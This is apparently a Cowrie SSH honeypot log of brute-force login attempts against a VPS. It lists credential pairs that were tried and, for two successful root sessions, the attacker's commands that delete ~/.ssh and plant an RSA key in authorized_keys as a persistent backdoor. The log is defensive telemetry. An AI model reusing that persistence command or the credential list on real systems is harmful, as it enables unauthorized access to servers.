{"eventid":"cowrie.session.closed","duration":180.21864104270935,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:43.506343Z","src_ip":"212.227.235.229","session":"83c9bb8cbc7c"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:44.403008Z","src_ip":"134.199.174.250","session":"91f744737bbc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39600,"dst_ip":"1.2.3.4","dst_port":22,"session":"29daaf7aea12","protocol":"ssh","message":"New connection: 212.227.235.229:39600 (1.2.3.4:22) [session: 29daaf7aea12]","sensor":"my-vps","timestamp":"2025-09-08T13:00:56.662338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:00:56.663129Z","src_ip":"212.227.235.229","session":"29daaf7aea12"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:00:56.837919Z","src_ip":"212.227.235.229","session":"29daaf7aea12"}
{"eventid":"cowrie.login.failed","username":"lsfadmin","password":"0","message":"login attempt [lsfadmin/0] failed","sensor":"my-vps","timestamp":"2025-09-08T13:00:57.576623Z","src_ip":"212.227.235.229","session":"29daaf7aea12"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:00:58.753657Z","src_ip":"212.227.235.229","session":"29daaf7aea12"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":60926,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e567bcdee91","protocol":"ssh","message":"New connection: 134.199.174.250:60926 (1.2.3.4:22) [session: 7e567bcdee91]","sensor":"my-vps","timestamp":"2025-09-08T13:01:10.578415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:01:10.579172Z","src_ip":"134.199.174.250","session":"7e567bcdee91"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:01:10.917772Z","src_ip":"134.199.174.250","session":"7e567bcdee91"}
{"eventid":"cowrie.login.failed","username":"test","password":"qwerty123","message":"login attempt [test/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:01:12.020451Z","src_ip":"134.199.174.250","session":"7e567bcdee91"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63106,"dst_ip":"1.2.3.4","dst_port":22,"session":"47632c97c129","protocol":"ssh","message":"New connection: 217.72.205.35:63106 (1.2.3.4:22) [session: 47632c97c129]","sensor":"my-vps","timestamp":"2025-09-08T13:01:13.247095Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:13.248624Z","src_ip":"217.72.205.35","session":"47632c97c129"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:13.415156Z","src_ip":"134.199.174.250","session":"7e567bcdee91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42790,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4ea931e17cf","protocol":"ssh","message":"New connection: 212.227.235.229:42790 (1.2.3.4:22) [session: c4ea931e17cf]","sensor":"my-vps","timestamp":"2025-09-08T13:01:25.567691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:01:25.570535Z","src_ip":"212.227.235.229","session":"c4ea931e17cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:01:25.868808Z","src_ip":"212.227.235.229","session":"c4ea931e17cf"}
{"eventid":"cowrie.login.failed","username":"testnet","password":"123456789","message":"login attempt [testnet/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T13:01:27.061535Z","src_ip":"212.227.235.229","session":"c4ea931e17cf"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:28.363606Z","src_ip":"212.227.235.229","session":"c4ea931e17cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48010,"dst_ip":"1.2.3.4","dst_port":22,"session":"82cc90b8f8ff","protocol":"ssh","message":"New connection: 212.227.235.229:48010 (1.2.3.4:22) [session: 82cc90b8f8ff]","sensor":"my-vps","timestamp":"2025-09-08T13:01:41.252863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:01:41.253968Z","src_ip":"212.227.235.229","session":"82cc90b8f8ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:01:41.523640Z","src_ip":"212.227.235.229","session":"82cc90b8f8ff"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":56512,"dst_ip":"1.2.3.4","dst_port":22,"session":"55ff101f25ec","protocol":"ssh","message":"New connection: 134.199.174.250:56512 (1.2.3.4:22) [session: 55ff101f25ec]","sensor":"my-vps","timestamp":"2025-09-08T13:01:41.670100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:01:41.739163Z","src_ip":"134.199.174.250","session":"55ff101f25ec"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:01:41.929325Z","src_ip":"134.199.174.250","session":"55ff101f25ec"}
{"eventid":"cowrie.login.success","username":"root","password":"John3:16","message":"login attempt [root/John3:16] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:01:42.647428Z","src_ip":"212.227.235.229","session":"82cc90b8f8ff"}
{"eventid":"cowrie.login.failed","username":"test","password":"1q2w3e4r","message":"login attempt [test/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T13:01:43.021201Z","src_ip":"134.199.174.250","session":"55ff101f25ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:01:43.205000Z","src_ip":"212.227.235.229","session":"82cc90b8f8ff"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:01:43.205694Z","src_ip":"212.227.235.229","session":"82cc90b8f8ff"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:01:43.206757Z","src_ip":"212.227.235.229","session":"82cc90b8f8ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:43.477610Z","src_ip":"212.227.235.229","session":"82cc90b8f8ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:01:44.146792Z","src_ip":"212.227.235.229","session":"82cc90b8f8ff"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.147663Z","src_ip":"212.227.235.229","session":"82cc90b8f8ff"}
{"eventid":"cowrie.session.connect","src_ip":"107.172.16.161","src_port":41952,"dst_ip":"1.2.3.4","dst_port":22,"session":"4aa87b05a720","protocol":"ssh","message":"New connection: 107.172.16.161:41952 (1.2.3.4:22) [session: 4aa87b05a720]","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.160768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.161522Z","src_ip":"107.172.16.161","session":"4aa87b05a720"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48680,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4de938840cc","protocol":"ssh","message":"New connection: 212.227.235.229:48680 (1.2.3.4:22) [session: a4de938840cc]","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.220065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.221485Z","src_ip":"212.227.235.229","session":"a4de938840cc"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.282686Z","src_ip":"134.199.174.250","session":"55ff101f25ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.328278Z","src_ip":"107.172.16.161","session":"4aa87b05a720"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.352326Z","src_ip":"212.227.235.229","session":"a4de938840cc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.420184Z","src_ip":"212.227.235.229","session":"82cc90b8f8ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.421029Z","src_ip":"212.227.235.229","session":"82cc90b8f8ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41120,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e9e6c6550b1","protocol":"ssh","message":"New connection: 212.227.235.229:41120 (1.2.3.4:22) [session: 8e9e6c6550b1]","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.681320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.682288Z","src_ip":"212.227.235.229","session":"8e9e6c6550b1"}
{"eventid":"cowrie.login.failed","username":"test2","password":"2025","message":"login attempt [test2/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.915320Z","src_ip":"212.227.235.229","session":"a4de938840cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:01:44.944272Z","src_ip":"212.227.235.229","session":"8e9e6c6550b1"}
{"eventid":"cowrie.login.success","username":"root","password":"sfdgfghkjlkhjghfgdfsd","message":"login attempt [root/sfdgfghkjlkhjghfgdfsd] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:01:45.023215Z","src_ip":"107.172.16.161","session":"4aa87b05a720"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:01:45.402159Z","src_ip":"107.172.16.161","session":"4aa87b05a720"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:01:45.402887Z","src_ip":"107.172.16.161","session":"4aa87b05a720"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:01:45.403646Z","src_ip":"107.172.16.161","session":"4aa87b05a720"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:01:45.575391Z","src_ip":"107.172.16.161","session":"4aa87b05a720"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:01:45.919061Z","src_ip":"107.172.16.161","session":"4aa87b05a720"}
